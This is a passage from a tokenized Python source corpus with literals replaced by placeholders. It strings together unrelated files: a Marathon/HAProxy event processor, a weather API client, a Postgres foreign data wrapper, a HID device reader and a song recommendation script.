<EOL> self . reset_from_tasks ( ) <EOL> def do_reset ( self ) : <EOL> with self . __condition : <EOL> logger . info ( '<STR_LIT>' ) <EOL> while True : <EOL> self . __condition . acquire ( ) <EOL> if self . __stop : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> if not self . __pending_reset : <EOL> if not self . __condition . wait ( <NUM_LIT> ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . __pending_reset = False <EOL> self . __condition . release ( ) <EOL> try : <EOL> start_time = time . time ( ) <EOL> self . __apps = get_apps ( self . __marathon ) <EOL> regenerate_config ( self . __apps , <EOL> self . __config_file , <EOL> self . __groups , <EOL> self . __bind_http_https , <EOL> self . __ssl_certs , <EOL> self . __templater ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> time . time ( ) - start_time ) <EOL> except requests . exceptions . ConnectionError as e : <EOL> logger . error ( "<STR_LIT>" . format ( <EOL> e . errno , e . strerror ) ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> def stop ( self ) : <EOL> self . __condition . 
acquire ( ) <EOL> self . __stop = True <EOL> self . __condition . notify ( ) <EOL> self . __condition . release ( ) <EOL> def reset_from_tasks ( self ) : <EOL> self . __condition . acquire ( ) <EOL> self . __pending_reset = True <EOL> self . __condition . notify ( ) <EOL> self . __condition . release ( ) <EOL> def handle_event ( self , event ) : <EOL> if event [ '<STR_LIT>' ] == '<STR_LIT>' or event [ '<STR_LIT>' ] == '<STR_LIT>' or event [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . reset_from_tasks ( ) <EOL> def get_arg_parser ( ) : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" , <EOL> formatter_class = argparse . ArgumentDefaultsHelpFormatter ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> nargs = "<STR_LIT:+>" , <EOL> help = "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> default = "<STR_LIT>" <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = list ( ) ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT:-c>" , <EOL> help = "<STR_LIT>" , <EOL> default = None ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . 
add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> type = int , default = <NUM_LIT:1000> <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> type = int , default = <NUM_LIT> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> type = int , default = <NUM_LIT> ) <EOL> parser = set_logging_args ( parser ) <EOL> parser = set_marathon_auth_args ( parser ) <EOL> return parser <EOL> def run_server ( marathon , listen_addr , callback_url , config_file , groups , <EOL> bind_http_https , ssl_certs ) : <EOL> processor = MarathonEventProcessor ( marathon , <EOL> config_file , <EOL> groups , <EOL> bind_http_https , <EOL> ssl_certs ) <EOL> try : <EOL> marathon . add_subscriber ( callback_url ) <EOL> def wsgi_app ( env , start_response ) : <EOL> length = int ( env [ '<STR_LIT>' ] ) <EOL> data = env [ '<STR_LIT>' ] . read ( length ) <EOL> processor . handle_event ( json . loads ( data . decode ( '<STR_LIT:utf-8>' ) ) ) <EOL> start_response ( '<STR_LIT>' , [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] ) <EOL> return [ "<STR_LIT>" . encode ( '<STR_LIT:utf-8>' ) ] <EOL> listen_uri = parse . urlparse ( listen_addr ) <EOL> httpd = make_server ( listen_uri . hostname , listen_uri . port , wsgi_app ) <EOL> httpd . serve_forever ( ) <EOL> finally : <EOL> processor . stop ( ) <EOL> def clear_callbacks ( marathon , callback_url ) : <EOL> logger . info ( "<STR_LIT>" . 
format ( callback_url ) ) <EOL> marathon . remove_subscriber ( callback_url ) <EOL> def process_sse_events ( marathon , config_file , groups , <EOL> bind_http_https , ssl_certs ) : <EOL> processor = MarathonEventProcessor ( marathon , <EOL> config_file , <EOL> groups , <EOL> bind_http_https , <EOL> ssl_certs ) <EOL> try : <EOL> events = marathon . get_event_stream ( ) <EOL> for event in events : <EOL> try : <EOL> if ( event . data . strip ( ) != '<STR_LIT>' ) : <EOL> for real_event_data in re . split ( r'<STR_LIT:\r\n>' , event . data ) : <EOL> data = json . loads ( real_event_data ) <EOL> logger . info ( <EOL> "<STR_LIT>" <EOL> . format ( data [ '<STR_LIT>' ] ) ) <EOL> processor . handle_event ( data ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" ) <EOL> except : <EOL> print ( event . data ) <EOL> print ( "<STR_LIT>" , sys . exc_info ( ) [ <NUM_LIT:0> ] ) <EOL> traceback . print_stack ( ) <EOL> raise <EOL> finally : <EOL> processor . stop ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arg_parser = get_arg_parser ( ) <EOL> args = arg_parser . parse_args ( ) <EOL> if args . longhelp : <EOL> print ( __doc__ ) <EOL> print ( '<STR_LIT>' ) <EOL> arg_parser . print_help ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( ConfigTemplater ( ) . get_descriptions ( ) ) <EOL> sys . exit ( ) <EOL> else : <EOL> if args . marathon is None : <EOL> arg_parser . error ( '<STR_LIT>' ) <EOL> if args . sse and args . listening : <EOL> arg_parser . error ( <EOL> '<STR_LIT>' ) <EOL> if bool ( args . min_serv_port_ip_per_task ) != bool ( args . max_serv_port_ip_per_task ) : <EOL> arg_parser . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if args . min_serv_port_ip_per_task > args . max_serv_port_ip_per_task : <EOL> arg_parser . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if len ( args . group ) == <NUM_LIT:0> : <EOL> arg_parser . error ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> if args . min_serv_port_ip_per_task and args . 
max_serv_port_ip_per_task : <EOL> SERVICE_PORT_ASSIGNER . set_ports ( args . min_serv_port_ip_per_task , <EOL> args . max_serv_port_ip_per_task ) <EOL> s = requests . Session ( ) <EOL> a = requests . adapters . HTTPAdapter ( max_retries = <NUM_LIT:3> ) <EOL> s . mount ( '<STR_LIT>' , a ) <EOL> setup_logging ( logger , args . syslog_socket , args . log_format ) <EOL> if args . health_check : <EOL> healthCheckResultCache = LRUCache ( args . lru_cache_capacity ) <EOL> set_ip_cache ( LRUCache ( args . lru_cache_capacity ) ) <EOL> marathon = Marathon ( args . marathon , <EOL> args . health_check , <EOL> get_marathon_auth_params ( args ) ) <EOL> if args . listening : <EOL> callback_url = args . callback_url or args . listening <EOL> try : <EOL> run_server ( marathon , args . listening , callback_url , <EOL> args . haproxy_config , args . group , <EOL> not args . dont_bind_http_https , args . ssl_certs ) <EOL> finally : <EOL> clear_callbacks ( marathon , callback_url ) <EOL> elif args . sse : <EOL> backoff = <NUM_LIT:3> <EOL> while True : <EOL> stream_started = time . time ( ) <EOL> try : <EOL> process_sse_events ( marathon , <EOL> args . haproxy_config , <EOL> args . group , <EOL> not args . dont_bind_http_https , <EOL> args . ssl_certs ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff = backoff * <NUM_LIT> <EOL> if backoff > <NUM_LIT> : <EOL> backoff = <NUM_LIT> <EOL> logger . error ( "<STR_LIT>" , backoff ) <EOL> if time . time ( ) - stream_started > <NUM_LIT> : <EOL> backoff = <NUM_LIT:3> <EOL> time . sleep ( random . random ( ) * backoff ) <EOL> else : <EOL> regenerate_config ( get_apps ( marathon ) , args . haproxy_config , args . group , <EOL> not args . dont_bind_http_https , <EOL> args . ssl_certs , ConfigTemplater ( ) ) </s>
<s> from __future__ import absolute_import , print_function <EOL> import functools <EOL> import logging <EOL> import sys <EOL> import time <EOL> debug = logging . debug <EOL> def fatal ( msg , code = <NUM_LIT:1> ) : <EOL> sys . stdout . write ( msg + "<STR_LIT:\n>" ) <EOL> logging . error ( msg ) <EOL> sys . exit ( code ) <EOL> def fn ( f , * args , ** kwargs ) : <EOL> logging . debug ( "<STR_LIT>" . format ( repr ( f ) , args , kwargs ) ) <EOL> return f ( * args , ** kwargs ) <EOL> def duration ( fn ) : <EOL> @ functools . wraps ( fn ) <EOL> def timer ( * args , ** kwargs ) : <EOL> start = time . time ( ) <EOL> try : <EOL> return fn ( * args , ** kwargs ) <EOL> finally : <EOL> debug ( "<STR_LIT>" . format ( <EOL> fn . __module__ , <EOL> fn . __name__ , <EOL> time . time ( ) - start ) ) <EOL> return timer </s>
<s> try : <EOL> import urllib . parse <EOL> import urllib . request <EOL> import urllib . error <EOL> except ImportError : <EOL> import urllib2 <EOL> import urllib <EOL> import json <EOL> class MesoPyError ( Exception ) : <EOL> def __init__ ( self , error_message ) : <EOL> self . error_message = error_message <EOL> def __str__ ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return repr ( self . error_message ) <EOL> class Meso ( object ) : <EOL> def __init__ ( self , token ) : <EOL> r"""<STR_LIT>""" <EOL> self . base_url = '<STR_LIT>' <EOL> self . token = token <EOL> self . geo_criteria = [ '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> @ staticmethod <EOL> def _checkresponse ( response ) : <EOL> r"""<STR_LIT>""" <EOL> results_error = '<STR_LIT>' <EOL> auth_error = '<STR_LIT>' '<STR_LIT>' <EOL> rule_error = '<STR_LIT>' '<STR_LIT>' <EOL> catch_error = '<STR_LIT>' <EOL> if response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:1> : <EOL> return response <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:2> : <EOL> raise MesoPyError ( results_error ) <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:200> : <EOL> raise MesoPyError ( auth_error ) <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT> : <EOL> raise MesoPyError ( rule_error ) <EOL> elif response [ '<STR_LIT>' ] [ '<STR_LIT>' ] == - <NUM_LIT:1> : <EOL> format_error = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> raise MesoPyError ( format_error ) <EOL> else : <EOL> raise MesoPyError ( catch_error ) <EOL> def _get_response ( self , endpoint , request_dict ) : <EOL> """<STR_LIT>""" <EOL> http_error = '<STR_LIT>' '<STR_LIT>' <EOL> try : <EOL> qsp = urllib . parse . urlencode ( request_dict , doseq = True ) <EOL> resp = urllib . request . urlopen ( self . base_url + endpoint + '<STR_LIT:?>' + qsp ) . 
read ( ) <EOL> except AttributeError or NameError : <EOL> try : <EOL> qsp = urllib . urlencode ( request_dict , doseq = True ) <EOL> resp = urllib2 . urlopen ( self . base_url + endpoint + '<STR_LIT:?>' + qsp ) . read ( ) <EOL> except urllib2 . URLError : <EOL> raise MesoPyError ( http_error ) <EOL> except urllib . error . URLError : <EOL> raise MesoPyError ( http_error ) <EOL> return self . _checkresponse ( json . loads ( resp . decode ( '<STR_LIT:utf-8>' ) ) ) <EOL> def _check_geo_param ( self , arg_list ) : <EOL> r"""<STR_LIT>""" <EOL> geo_func = lambda a , b : any ( i in b for i in a ) <EOL> check = geo_func ( self . geo_criteria , arg_list ) <EOL> if check is False : <EOL> raise MesoPyError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def attime ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def latest ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def precip ( self , start , end , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def timeseries ( self , start , end , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def climatology ( self , startclim , endclim , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . 
_check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = startclim <EOL> kwargs [ '<STR_LIT>' ] = endclim <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def variables ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _get_response ( '<STR_LIT>' , { '<STR_LIT>' : self . token } ) <EOL> def climate_stats ( self , startclim , endclim , type , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:type>' ] = type <EOL> kwargs [ '<STR_LIT>' ] = startclim <EOL> kwargs [ '<STR_LIT>' ] = endclim <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def time_stats ( self , start , end , type , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:type>' ] = type <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def metadata ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def latency ( self , start , end , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> self . _check_geo_param ( kwargs ) <EOL> kwargs [ '<STR_LIT:start>' ] = start <EOL> kwargs [ '<STR_LIT:end>' ] = end <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def networks ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) <EOL> def networktypes ( self , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> kwargs [ '<STR_LIT>' ] = self . token <EOL> return self . _get_response ( '<STR_LIT>' , kwargs ) </s>
<s> from messagebird . base import Base <EOL> class Recipient ( Base ) : <EOL> def __init__ ( self ) : <EOL> self . recipient = None <EOL> self . status = None <EOL> self . _statusDatetime = None <EOL> @ property <EOL> def statusDatetime ( self ) : <EOL> return self . _statusDatetime <EOL> @ statusDatetime . setter <EOL> def statusDatetime ( self , value ) : <EOL> self . _statusDatetime = self . value_to_time ( value ) </s>
<s> from multicorn import ForeignDataWrapper <EOL> from multicorn . utils import log_to_postgres , ERROR , DEBUG <EOL> from yajl import YajlContentHandler , YajlParser <EOL> from Queue import Queue <EOL> from threading import Thread <EOL> import urllib <EOL> import urllib2 <EOL> import json <EOL> import pprint <EOL> import collections <EOL> class CaseInsensitiveDict ( collections . Mapping ) : <EOL> def __init__ ( self , d ) : <EOL> self . _d = d <EOL> self . _s = dict ( ( k . lower ( ) , k ) for k in d ) <EOL> def __contains__ ( self , k ) : <EOL> return k . lower ( ) in self . _s <EOL> def __len__ ( self ) : <EOL> return len ( self . _s ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _s ) <EOL> def __getitem__ ( self , k ) : <EOL> return self . _d [ self . _s [ k . lower ( ) ] ] <EOL> def actual_key_case ( self , k ) : <EOL> return self . _s . get ( k . lower ( ) ) <EOL> class ContentHandler ( YajlContentHandler ) : <EOL> _column = '<STR_LIT>' <EOL> INIT = <NUM_LIT:0> <EOL> IN_OBJECT = <NUM_LIT:1> <EOL> SEEN_RECORDS = <NUM_LIT:2> <EOL> IN_ARRAY = <NUM_LIT:3> <EOL> IN_RECORD = <NUM_LIT:4> <EOL> SEEN_KEY = <NUM_LIT:5> <EOL> _state = INIT <EOL> _depth = <NUM_LIT:0> <EOL> def __init__ ( self , queue , column_map ) : <EOL> self . _queue = queue <EOL> self . _column_map = column_map <EOL> def handle_value ( self , ctx , val ) : <EOL> if self . _state == ContentHandler . SEEN_KEY and self . _depth == <NUM_LIT:0> : <EOL> self . _state = ContentHandler . IN_RECORD <EOL> self . _record [ self . _column_map [ self . _column ] ] = val <EOL> def yajl_null ( self , ctx ) : <EOL> self . handle_value ( ctx , None ) <EOL> def yajl_boolean ( self , ctx , boolVal ) : <EOL> self . handle_value ( ctx , boolVal ) <EOL> def yajl_integer ( self , ctx , integerVal ) : <EOL> self . handle_value ( ctx , integerVal ) <EOL> def yajl_double ( self , ctx , doubleVal ) : <EOL> self . handle_value ( ctx , doubleVal ) <EOL> def yajl_string ( self , ctx , stringVal ) : <EOL> self . 
handle_value ( ctx , stringVal ) <EOL> def yajl_start_map ( self , ctx ) : <EOL> if self . _state == ContentHandler . SEEN_KEY : <EOL> self . _depth += <NUM_LIT:1> <EOL> elif self . _state == ContentHandler . IN_ARRAY : <EOL> self . _state = ContentHandler . IN_RECORD <EOL> self . _record = { } <EOL> elif self . _state == ContentHandler . INIT : <EOL> self . _state = ContentHandler . IN_OBJECT <EOL> def yajl_map_key ( self , ctx , stringVal ) : <EOL> if self . _state == ContentHandler . IN_RECORD : <EOL> self . _state = ContentHandler . SEEN_KEY <EOL> self . _column = stringVal <EOL> elif self . _state == ContentHandler . IN_OBJECT and stringVal == '<STR_LIT>' : <EOL> self . _state = ContentHandler . SEEN_RECORDS <EOL> def yajl_end_map ( self , ctx ) : <EOL> if self . _state == ContentHandler . SEEN_KEY : <EOL> self . _depth -= <NUM_LIT:1> <EOL> if self . _depth == <NUM_LIT:0> : <EOL> self . _state = ContentHandler . IN_RECORD <EOL> elif self . _state == ContentHandler . IN_RECORD : <EOL> self . _state = ContentHandler . IN_ARRAY <EOL> self . _queue . put ( self . _record ) <EOL> elif self . _state == ContentHandler . IN_OBJECT : <EOL> self . _state = ContentHandler . INIT <EOL> def yajl_start_array ( self , ctx ) : <EOL> if self . _state == ContentHandler . SEEN_RECORDS : <EOL> self . _state = ContentHandler . IN_ARRAY <EOL> def yajl_end_array ( self , ctx ) : <EOL> if self . _state == ContentHandler . IN_ARRAY : <EOL> self . _state = ContentHandler . IN_OBJECT <EOL> def parseToQueue ( stream , queue , column_map ) : <EOL> parser = YajlParser ( ContentHandler ( queue , column_map ) ) <EOL> parser . parse ( stream ) <EOL> queue . put ( None ) <EOL> class DatabaseDotComForeignDataWrapper ( ForeignDataWrapper ) : <EOL> def __init__ ( self , options , columns ) : <EOL> super ( DatabaseDotComForeignDataWrapper , self ) . __init__ ( options , columns ) <EOL> self . column_map = CaseInsensitiveDict ( dict ( [ ( x , x ) for x in columns ] ) ) <EOL> self . 
obj_type = options . get ( '<STR_LIT>' , None ) <EOL> if self . obj_type is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . client_id = options . get ( '<STR_LIT>' , None ) <EOL> if self . client_id is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . client_secret = options . get ( '<STR_LIT>' , None ) <EOL> if self . client_secret is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . username = options . get ( '<STR_LIT:username>' , None ) <EOL> if self . username is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . password = options . get ( '<STR_LIT:password>' , None ) <EOL> if self . password is None : <EOL> log_to_postgres ( '<STR_LIT>' , <EOL> ERROR ) <EOL> self . login_server = options . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . oauth = self . get_token ( ) <EOL> def get_token ( self ) : <EOL> token_url = '<STR_LIT>' % self . login_server <EOL> params = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT:username>' : self . username , <EOL> '<STR_LIT:password>' : self . password <EOL> } ) <EOL> log_to_postgres ( '<STR_LIT>' % token_url , DEBUG ) <EOL> try : <EOL> data = urllib2 . urlopen ( token_url , params ) . read ( ) <EOL> except urllib2 . URLError , e : <EOL> if hasattr ( e , '<STR_LIT:code>' ) : <EOL> if e . code == <NUM_LIT> : <EOL> log_to_postgres ( <EOL> '<STR_LIT>' , ERROR , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e . code , ERROR ) <EOL> elif hasattr ( e , '<STR_LIT>' ) : <EOL> log_to_postgres ( '<STR_LIT>' % <EOL> ( token_url , e . reason [ <NUM_LIT:0> ] , e . reason [ <NUM_LIT:1> ] ) , ERROR , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e , ERROR ) <EOL> log_to_postgres ( '<STR_LIT>' % data , DEBUG ) <EOL> oauth = json . loads ( data ) <EOL> log_to_postgres ( '<STR_LIT>' % ( self . 
login_server , self . username ) ) <EOL> return oauth <EOL> def execute ( self , quals , columns , retry = True ) : <EOL> cols = '<STR_LIT>' ; <EOL> for column_name in list ( columns ) : <EOL> cols += '<STR_LIT>' % column_name <EOL> cols = cols [ <NUM_LIT:1> : ] <EOL> where = '<STR_LIT>' <EOL> parameters = [ ] <EOL> for qual in quals : <EOL> operator = '<STR_LIT>' if qual . operator == '<STR_LIT>' else qual . operator <EOL> where += '<STR_LIT>' % ( <EOL> qual . field_name , operator , qual . value ) <EOL> where = where [ <NUM_LIT:5> : ] <EOL> query = '<STR_LIT>' + cols + '<STR_LIT>' + self . obj_type <EOL> if len ( where ) > <NUM_LIT:0> : <EOL> query += '<STR_LIT>' % where <EOL> log_to_postgres ( '<STR_LIT>' % query ) <EOL> params = urllib . urlencode ( { <EOL> '<STR_LIT:q>' : query <EOL> } ) <EOL> query_url = ( self . oauth [ '<STR_LIT>' ] + <EOL> '<STR_LIT>' % params ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' % self . oauth [ '<STR_LIT>' ] <EOL> } <EOL> req = urllib2 . Request ( query_url , None , headers ) <EOL> queue = Queue ( ) <EOL> try : <EOL> stream = urllib2 . urlopen ( req ) ; <EOL> except urllib2 . URLError , e : <EOL> if hasattr ( e , '<STR_LIT:code>' ) : <EOL> if e . code == <NUM_LIT> and retry : <EOL> log_to_postgres ( '<STR_LIT>' % <EOL> self . oauth [ '<STR_LIT>' ] ) <EOL> self . oauth = self . get_token ( ) <EOL> for line in self . execute ( quals , columns , False ) : <EOL> yield line <EOL> return <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e . code , ERROR ) <EOL> elif hasattr ( e , '<STR_LIT>' ) : <EOL> log_to_postgres ( '<STR_LIT>' % <EOL> ( token_url , e . reason [ <NUM_LIT:0> ] , e . reason [ <NUM_LIT:1> ] ) , ERROR ) <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e , ERROR ) <EOL> t = Thread ( target = parseToQueue , args = ( stream , queue , self . column_map ) ) <EOL> t . daemon = True <EOL> t . start ( ) <EOL> item = queue . get ( ) <EOL> while item is not None : <EOL> yield item <EOL> queue . 
task_done ( ) <EOL> item = queue . get ( ) </s>
<s> import sys <EOL> import hid <EOL> import time <EOL> class VStrokerDevice ( object ) : <EOL> VID = <NUM_LIT> <EOL> PID = <NUM_LIT> <EOL> PRODUCT_NAME = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . _device = None <EOL> @ staticmethod <EOL> def getDeviceList ( ) : <EOL> devices = [ ] <EOL> for d in hid . enumerate ( VStrokerDevice . VID , VStrokerDevice . PID ) : <EOL> if d [ "<STR_LIT>" ] != "<STR_LIT>" : <EOL> continue <EOL> devices . append ( d [ "<STR_LIT:path>" ] ) <EOL> return devices <EOL> def isOpen ( self ) : <EOL> return self . _device != None <EOL> def open ( self , path ) : <EOL> self . _device = hid . device ( ) <EOL> self . _device . open_path ( path ) <EOL> self . _device . set_nonblocking ( <NUM_LIT:1> ) <EOL> return True <EOL> def close ( self ) : <EOL> self . _device . close ( ) <EOL> self . _device = None <EOL> def getRawData ( self ) : <EOL> data = self . _device . read ( <NUM_LIT:10> ) <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> return None <EOL> return data <EOL> def getParsedData ( self ) : <EOL> data = self . getRawData ( ) <EOL> if data is None : <EOL> return None <EOL> axis = [ ] <EOL> xor_byte = data [ <NUM_LIT:0> ] <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> a = ( ( ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:1> ] & <NUM_LIT> ) << <NUM_LIT:4> ) | ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:1> ] >> <NUM_LIT:4> ) ) ^ xor_byte <EOL> b = ( ( ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:2> ] & <NUM_LIT> ) << <NUM_LIT:4> ) | ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:2> ] >> <NUM_LIT:4> ) ) ^ xor_byte <EOL> c = a | ( b << <NUM_LIT:8> ) <EOL> if c > <NUM_LIT:2> ** <NUM_LIT:15> : <EOL> c = c - <NUM_LIT:2> ** <NUM_LIT:16> <EOL> axis . append ( c ) <EOL> return axis <EOL> def main ( ) : <EOL> d = VStrokerDevice . getDeviceList ( ) <EOL> if len ( d ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> return <NUM_LIT:1> <EOL> print d <EOL> v = VStrokerDevice ( ) <EOL> v . open ( d [ <NUM_LIT:0> ] ) <EOL> try : <EOL> while True : <EOL> l = v . 
getParsedData ( ) <EOL> if l is None : <EOL> time . sleep ( <NUM_LIT> ) <EOL> continue <EOL> print l <EOL> except KeyboardInterrupt : <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> import sys <EOL> import scipy . io <EOL> import numpy <EOL> import util <EOL> mtxfile , evalfile , outfile = sys . argv [ <NUM_LIT:1> : ] <EOL> colisten = scipy . io . mmread ( file ( mtxfile ) ) . tocsr ( ) <EOL> listens = colisten . diagonal ( ) <EOL> listenranked = numpy . argsort ( - listens ) [ : <NUM_LIT> ] <EOL> with open ( outfile , '<STR_LIT:w>' ) as out : <EOL> for history in util . songs_by_user ( evalfile ) : <EOL> songs , counts = zip ( * history ) <EOL> sim = numpy . array ( counts ) [ numpy . newaxis , : ] * colisten [ numpy . array ( songs ) - <NUM_LIT:1> , : ] <EOL> simidxs = sim . nonzero ( ) [ <NUM_LIT:1> ] <EOL> srt = numpy . lexsort ( ( - listens [ simidxs ] , - sim [ <NUM_LIT:0> , simidxs ] ) ) <EOL> rankidxs = simidxs [ srt ] <EOL> guess = [ ] <EOL> for s in rankidxs : <EOL> if s + <NUM_LIT:1> in songs : <EOL> continue <EOL> guess . append ( str ( s + <NUM_LIT:1> ) ) <EOL> if len ( guess ) == <NUM_LIT> : break <EOL> else : <EOL> for s in listenranked : <EOL> if s + <NUM_LIT:1> in songs or s in rankidxs : <EOL> continue <EOL> guess . append ( str ( s + <NUM_LIT:1> ) ) <EOL> if len ( guess ) == <NUM_LIT> : break <EOL> out . write ( '<STR_LIT:U+0020>' . join ( guess ) + 